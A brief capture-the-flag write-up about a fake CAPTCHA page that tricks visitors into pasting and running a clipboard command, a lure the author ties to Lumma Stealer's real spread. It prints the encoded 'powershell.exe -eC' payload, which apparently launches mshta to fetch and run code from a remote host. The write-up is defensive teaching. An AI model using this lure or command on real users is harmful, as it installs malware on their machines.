Solution
When you open the interface of the website, you will see that it has a button for captcha validation and when you click on it, instructions will appear.
If you follow the instructions, you will see the payload when you do Ctrl + V
This is actually a malicious powershell script that leads to another link
powershell.exe -eC bQBzAGgAdABhACAAaAB0AHQAcAA6AC8ALwBuAG8AbgBtAGEAbABpAGMAaQBvAHUAcwBjAGEAcAB0AGMAaABhAC4AbQBlAHQAYQBwAHIAbwBiAGwAZQBtAHMALgBjAG8AbQAvAE0AZQB0AGEAQwBUAEYAewBGADQAawAzAF8AYwA0AHAAVABjAGgAQABzAF8AcgB1AE4AXwBtADQAbAB3ADQAcgAzAH0A
Decode the payload you will get the flag
Actually in practice you should be careful and not follow the instructions but look at the source code first and you will also see the malicious payload this way
In the wild, this is the malware spreading method that Lumma Stealer is using and is very popular recently.
Flag
MetaCTF{F4k3_c4pTch@s_ruN_m4lw4r3}